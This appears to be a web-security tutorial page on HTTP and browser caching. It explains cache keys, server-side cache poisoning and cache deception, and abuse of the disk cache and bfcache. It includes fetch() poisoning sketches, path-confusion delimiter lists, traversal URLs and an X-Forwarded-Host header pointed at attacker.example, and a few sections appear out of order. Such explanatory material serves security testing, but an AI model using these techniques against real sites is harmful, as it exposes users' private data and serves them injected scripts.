Caching
Remember static content so that fewer requests need to be resolved by the backend
To save on bandwidth and respond faster, large websites often implement a caching proxy in front of their regular servers with a simple task: remember static content and handle requests that don't need the backend. While it sounds simple, it raises a lot of questions, such as what needs to be cached, and for whom?
There are a few concepts that all caches share and that are useful to understand. First of all, Cache Rules: the decisions the caching proxy makes to figure out whether a request/response should be cached for future requests. Some dynamic APIs should never be cached, so you'll often see these rules target static resources like JS/CSS or images.
Then there are Cache Keys: the normalized versions of requests that determine which requests should return equivalent responses, without actually asking the backend. These often include the path, the query parameters, and potentially some headers. If two requests with the same cache key come in, the 1st will be resolved by the backend and the 2nd will be instantly answered from the cache with the 1st response.
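A cache key can be sketched as a small normalization function. The exact fields below (method, path, sorted query, a configurable `Vary` list) are an illustrative assumption, not the algorithm of any specific proxy:

```python
from urllib.parse import urlsplit, parse_qsl

def cache_key(method, url, headers, vary=("accept-encoding",)):
    """Build a simplified cache key: method, path, sorted query parameters,
    and any request headers listed in `vary`. Illustrative sketch only."""
    parts = urlsplit(url)  # the fragment (#...) is dropped automatically
    query = tuple(sorted(parse_qsl(parts.query)))
    varied = tuple((h, headers.get(h, "")) for h in vary)
    return (method.upper(), parts.path, query, varied)

# Two requests that normalize to the same key share one cached response:
k1 = cache_key("GET", "/static/app.js?v=2&x=1", {})
k2 = cache_key("get", "/static/app.js?x=1&v=2#ignored", {})
```

Note how reordered query parameters, method casing, and the fragment all collapse into the same key, so the second request would be answered from the cache.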
By sending the same request to an endpoint multiple times, there are a few different ways you can detect the effects of caching:
Sometimes the response contains specific headers such as X-Cache-Status: MISS (meaning it wasn't stored before, but is now) or CF-Cache-Status: HIT (meaning it was stored and is now returned from the cache). BYPASS often means it wasn't cached and was instead requested from the backend.
If the backend is noticeably slow, you may be able to measure when a resource responds quicker than normal because it's directly from the caching server.
If you can edit the underlying resource (such as a profile image), request it, change your image, and then quickly request it again to check whether the change had an effect, or whether it only shows up some time later.
While testing, it is common to use cache busters to explicitly not cache something, or to cache it only under a specific identifier for testing. Put the same random string into both of your testing requests: this guarantees the resource hasn't been cached before by other users, but it may be cached now that you've requested it. This is often done with a ?cb=$RANDOM query parameter.
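The cache-buster technique can be sketched as a small helper (the host and parameter name are illustrative):

```python
import secrets
from urllib.parse import urlsplit, urlunsplit

def with_cache_buster(url, param="cb"):
    """Append a random cache-buster query parameter, giving the request a
    cache key no other user has used before. Parameter name is arbitrary."""
    token = secrets.token_hex(8)
    parts = urlsplit(url)
    query = f"{parts.query}&{param}={token}" if parts.query else f"{param}={token}"
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))

url = with_cache_buster("https://example.com/static/app.js")
# Send this same URL twice: the first response should be a cache MISS,
# the second a HIT if the resource is cacheable.
```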
To check if a page was loaded through bfcache, keep an eye on the Application -> Back/forward cache section of your DevTools. While navigating, this will show either "Not served from back/forward cache" (with a reason, if you pressed the Back button) or "Successfully served from back/forward cache" when it was successful.
Restoring from this cache means all JavaScript and DOM state (including input values) will remain the same, allowing an attacker to attack this data with a localStorage XSS or anything else that gets reloaded. In some more complex attacks it can be useful to clear the bfcache, which is possible by simply overflowing its maximum of 6 entries with navigations, and then going back to your target page with history.go(-n).
Poisoning top-level navigation with fetch()
I previously stated that a top-level navigation will always first revalidate, and then either get the page from the cache if it hasn't changed, or get the new one. This is not entirely true, as there is actually another way to load a URL top-level: via the bfcache. When pressing the back button (or triggering it via JavaScript), the next page may be loaded in one of three ways:
1. If it is stored in the Back/forward cache, return it directly from there
2. If it is stored in the disk cache, return it directly from there
3. Send a request to the server and return that response
It's hard to influence option 1, but option 2 can be poisoned by a fetch() call that stores a cache entry for a URL with some special headers. If the response to this fetch is of type text/html and contains an XSS payload, a top-level navigation served from the cache may trigger it, even though a navigation shouldn't normally be able to send special extra headers or a request method such as PUT, DELETE or PATCH.
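A minimal sketch of such a poisoning call. The URL, header name, and cache option are assumptions for illustration; in practice the response must be cacheable, of type text/html, and the request must be same-origin or permitted by CORS:

```javascript
// Hypothetical sketch: store a response in the browser's disk cache via
// fetch(). A later top-level (back/forward) navigation to the same URL may
// then be served this poisoned entry without revalidating.
async function poisonDiskCache(url) {
  return fetch(url, {
    method: "PUT",                // a method a navigation cannot send
    headers: { "X-Custom": "1" }, // a header a navigation cannot send
    cache: "reload",              // bypass the cache, then store the fresh response
  });
}
// Usage (not executed here): poisonDiskCache("https://victim.example/page")
```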
When two requests normalize to the same cache key, they should always result in the same response. With tricky parsing and rules, however, this is sometimes not the case. Take any request that a regular user's browser makes while browsing the website, such as a resource or page. If an attacker can make a request with the same cache key that causes a different response than expected to be cached, it can be disastrous for the user, as it often makes the feature/application unusable.
That is the gist of Cache Poisoning: altering a request so that a different, still cacheable response is stored for users to encounter.
The most important part of exploiting this is knowing the cache key. If you can alter your request enough to cause a different response while keeping the same cache key, it is vulnerable. Note that your alternative response must still be cacheable; this is where cache rules come in. If it causes a 400 Bad Request or 404 response, it will often be denied from the cache, and the 2nd request will hit the backend anyway. You need a successful but different response.
When working with source code, it is best to look for request attributes that trigger conditional behavior, often around returning a different kind of response (e.g. the Accept: header). In a blackbox scenario, fuzzing may be a better option: try weird variations of the request while keeping track of whether it is still being cached under the same key.
Sometimes a very lax cache key can miss things like query parameters that are important for controlling a backend response. Another sneaky method is using the # character in a request. While fragments are not normally sent over HTTP, they can be, and the backend server may deal with them in a strange way:
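A request of roughly this shape illustrates the idea (the host and paths are hypothetical):

```http
GET /static/main.js#/../../uploads/malicious.js HTTP/1.1
Host: victim.example
```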
The cache key of such a request may be truncated to /static/main.js, while the backend interprets the path traversal after the # and returns the uploaded malicious JavaScript file.
If the cache is shared between users, private data should not end up in it. In Cache Deception, an attacker prepares a URL that a victim will visit, causing some of their personal data to be cached together with their authentication. The attacker can then request the same URL to get back the cached response without authentication.
Routes like /api/profile are normally ruled out from the cache, while files under /static or with the .js extension will always be cached. If you can confuse the URL parsers of the caching proxy and the backend such that the proxy thinks your URL matches the cache rules, while the backend returns private user data, you have Cache Deception!
Nginx will resolve even encoded path traversals, so one example exploit would be sending the victim to:
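One plausible shape for such a URL (the host is hypothetical), assuming the proxy keys on the raw path while Nginx decodes and resolves it:

```http
https://victim.example/static/..%2Fapi/profile
```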
A caching proxy like Cloudflare may be configured to cache every path starting with /static/, while Nginx passes the decoded and resolved /api/profile to the backend, returning the currently logged-in user's private data. This response is now cached, and when the attacker requests the same URL shortly after the victim, they will receive their victim's response.
For file extensions, it is common to try and find a character that truncates the path, such as ;.js in Tomcat, or %00.js when strings are null-terminated. If the path is matched including the query string, simply adding the extension after a question mark like ?.js will do. When the question mark is normalized away, an encoded one (%3F.js) may do the trick.
You may be able to see the pattern here: simply fuzz all potential characters and their encoded forms to try and find delimiters, then exploit whichever one the cache and backend disagree on.
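The fuzzing step can be sketched as a candidate generator. The delimiter list below is illustrative, not exhaustive; a real test would cover all special characters and their encodings:

```python
def extension_candidates(path, ext=".js"):
    """Generate candidate URLs that may trick cache rules into treating a
    dynamic endpoint as a static file. Delimiters are hypothetical examples."""
    delimiters = [";", "%00", "?", "%3F", "#", "%23"]
    return [path + d + ext for d in delimiters]

# Each candidate is requested while authenticated, then again without
# authentication, to see if the private response was cached.
candidates = extension_candidates("/api/profile")
```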
In some PHP configurations, it is also common to rewrite every suffix path of a .php file to the same endpoint, for example:
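A hypothetical example of such PATH_INFO-style routing, where both paths hit the same script but only the second matches a .js cache rule:

```http
https://victim.example/profile.php
https://victim.example/profile.php/anything.js
```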
All of these tricks require the cache key to not include any unpredictable data, such as the session cookie. The cache needs to be shared between users so that an unauthenticated attacker can retrieve the stolen data.
Browsers will cache certain responses in the disk or memory cache. While testing, make sure the "Disable cache" checkbox in the Network tab of your DevTools is unchecked. To clear this cache, the easiest way is to clear it globally via chrome://settings/clearBrowserData (Chrome) or about:preferences#privacy (Firefox).
In the table of requests, you'll see "(memory cache)" or "(disk cache)" in place of the Size column if the response came from the cache. You may also see 304 Not Modified status codes for responses that are cached, but revalidated to ensure they haven't changed. Top-level navigations will always revalidate the cache, but fetch() calls or resource loads can be served directly from the cache with no request to the server.
The Cache-Control header decides if and for how long a response will be cached, and how it is revalidated. The Vary header adds the specified request headers to the cache key. If no such headers are given, the browser will cache the response by default but revalidate it every time it is used (with the If-Modified-Since or If-None-Match header). If you need to get the cached version of a response without revalidating first, fetch() has a cache option that you can set to force-cache.
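A sketch of reading a response straight from the HTTP cache without a conditional revalidation request first (the URL is hypothetical):

```javascript
// Prefer whatever is already in the HTTP cache, skipping revalidation.
// Only if there is no cached entry at all does this go to the network.
async function fromCache(url) {
  const res = await fetch(url, { cache: "force-cache" });
  return res.text();
}
// Usage (not executed here): fromCache("/static/app.js")
```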
One edge case is service workers, which need to be registered with a specific JavaScript URL. These skip the cache by default, but using the { updateViaCache: 'all' } option you can enable caching for the worker script. This may allow you to poison the cache client-side and then load a service worker from there for persistent XSS.
Another use for the disk cache is the fact that the HTML will always stay the same, while JavaScript code is re-executed. If this code fetches a payload dynamically, it can allow you to run a payload multiple times on one static DOM, even if during regular navigations the DOM would be different every time. This could be useful in limited CSS Injection scenarios. See Poisoning top-level navigation with fetch() for how to perform a top-level navigation to a disk-cached resource without revalidating. It may also be used to retrieve an earlier response with XSS that the user navigated away from and cannot get back to due to corruption, a different cookie, etc.
To protect against attacks involving caches, such as XS-Leaks or client-side Cache Poisoning/Deception, caches are partitioned by eTLD+1. This means subdomains will share a cache, but a separate attacker's domain will not.
While the disk cache helps with speed, the browser's Back and Forward buttons should ideally keep the state of the webpage as well. This is what the Back/forward cache (or "bfcache") does: it remembers the pages you navigate through, together with their JavaScript heap. You can trigger it programmatically with history.back() or the more generic history.go(n).
To skip option 1, there are some rules that make the bfcache disallowed, such as the page still having an opener reference. This can be achieved by first landing on an attacker's page, and then opening the URL you will later restore from cache. Then navigate to the URL that will poison the cache, and finally execute history.back(). Because the page still has an opener reference to the attacker's page, the bfcache won't be used, but the disk cache entry from the fetch will.
This is often achieved with extra request headers. Some of these headers will cause the application to act differently, perhaps returning a redirect or a different response format. NextJS in particular has repeatedly been shown to be vulnerable to this.
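A classic shape of such a poisoning request (host and values are illustrative; X-Forwarded-Host is a commonly unkeyed header):

```http
GET /page HTTP/1.1
Host: victim.example
X-Forwarded-Host: attacker.example
```

If the application uses the header to build URLs in the response while the cache key ignores it, the poisoned response is then served to every user requesting /page.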